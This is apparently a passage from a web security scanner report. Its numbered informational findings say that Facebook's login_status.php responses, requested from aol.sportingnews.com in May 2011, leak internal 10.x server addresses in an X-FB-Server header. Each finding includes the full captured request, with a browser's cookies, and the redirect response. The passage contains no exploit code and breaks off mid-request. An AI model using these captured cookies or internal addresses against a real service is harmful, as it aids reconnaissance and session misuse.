GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfbca519a%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1cbbb31d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df26d65d1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1cbbb31d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df139869c7c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3da78930%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1cbbb31d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df139869c7c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcc116d64%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1cbbb31d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df139869c7c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2df0957e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1cbbb31d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df139869c7c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fcc116d64&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1cbbb31d&relation=parent&transport=postmessage&frame=f139869c7c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.152.34
X-Cnection: close
Date: Thu, 05 May 2011 01:30:47 GMT
Content-Length: 0


20.79. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.64.29

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3db43803%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff39b2eecc8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ef9b0e68%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff39b2eecc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bc242cf%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2738467b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff39b2eecc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bc242cf&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1bc83614%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff39b2eecc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bc242cf&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b27cb628%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff39b2eecc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bc242cf&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1bc83614&origin=http%3A%2F%2Faol.sportingnews.com%2Ff39b2eecc8&relation=parent&transport=postmessage&frame=f3bc242cf
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.64.29
X-Cnection: close
Date: Thu, 05 May 2011 01:40:34 GMT
Content-Length: 0


20.80. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.43.69.63

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfee579ebc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e8fdbe9%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13244f834%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9540f77c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13244f834&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e4056f3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13244f834&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df119d5b63%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13244f834&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1e4056f3&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1450dca4c&relation=parent&transport=postmessage&frame=f13244f834
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.69.63
X-Cnection: close
Date: Thu, 05 May 2011 00:58:34 GMT
Content-Length: 0


20.81. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.149.125

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df328777d1%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff163ac1304%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df58ac4d98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff163ac1304%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2fdf60c54%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31b5fd2%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff163ac1304%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2fdf60c54&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df352e95b5%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff163ac1304%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2fdf60c54&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df39d335744%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff163ac1304%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2fdf60c54&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f352e95b5&origin=http%3A%2F%2Faol.sportingnews.com%2Ff163ac1304&relation=parent&transport=postmessage&frame=f2fdf60c54
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.149.125
X-Cnection: close
Date: Thu, 05 May 2011 01:08:17 GMT
Content-Length: 0


20.82. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.193.59

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7d891404%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18a587ed8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17660a08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18a587ed8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a7263a1%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfac36936c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18a587ed8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a7263a1&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f0d96edc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18a587ed8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a7263a1&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a9bebd38%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18a587ed8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a7263a1&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1f0d96edc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff18a587ed8&relation=parent&transport=postmessage&frame=f3a7263a1
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.193.59
X-Cnection: close
Date: Thu, 05 May 2011 02:15:04 GMT
Content-Length: 0


20.83. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.183.62

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df217a13dac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e1582544%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc7d6a30%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e1582544%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd60468a4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3a7952c88%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e1582544%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd60468a4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3746fb4b4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e1582544%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd60468a4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1900db7fc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e1582544%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd60468a4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3746fb4b4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2e1582544&relation=parent&transport=postmessage&frame=fd60468a4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.183.62
X-Cnection: close
Date: Thu, 05 May 2011 01:31:58 GMT
Content-Length: 0


20.84. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.76.79

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b21a0e64%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37c740fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18a1dcce4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37c740fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d7f588f%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f2885b3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37c740fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d7f588f&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df304014ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37c740fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d7f588f&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24da0ac2c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37c740fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d7f588f&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f304014ac&origin=http%3A%2F%2Faol.sportingnews.com%2Ff37c740fc&relation=parent&transport=postmessage&frame=f1d7f588f
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.76.79
X-Cnection: close
Date: Thu, 05 May 2011 01:37:36 GMT
Content-Length: 0


20.85. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.137.126

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e397152%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff311f4ad5%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b8848144%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff311f4ad5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11aab8794%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a449b64%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff311f4ad5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11aab8794&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df355898d4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff311f4ad5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11aab8794&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df378f0dfa8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff311f4ad5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11aab8794&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f355898d4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff311f4ad5&relation=parent&transport=postmessage&frame=f11aab8794
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.137.126
X-Cnection: close
Date: Thu, 05 May 2011 01:12:37 GMT
Content-Length: 0


20.86. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.100.122

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20b8bea68%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff9917dca4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df233ce1c08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff9917dca4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ef4c6c58%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33c86890%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff9917dca4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ef4c6c58&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b9f10734%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff9917dca4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ef4c6c58&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16cfdba8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff9917dca4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ef4c6c58&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3b9f10734&origin=http%3A%2F%2Faol.sportingnews.com%2Ff9917dca4&relation=parent&transport=postmessage&frame=f2ef4c6c58
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.100.122
X-Cnection: close
Date: Thu, 05 May 2011 02:04:00 GMT
Content-Length: 0


20.87. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.136.132

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11f07c834%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b85da034%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d6bb38c4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b85da034%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df85d88918%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15e020e24%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b85da034%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df85d88918&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d9837ddc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b85d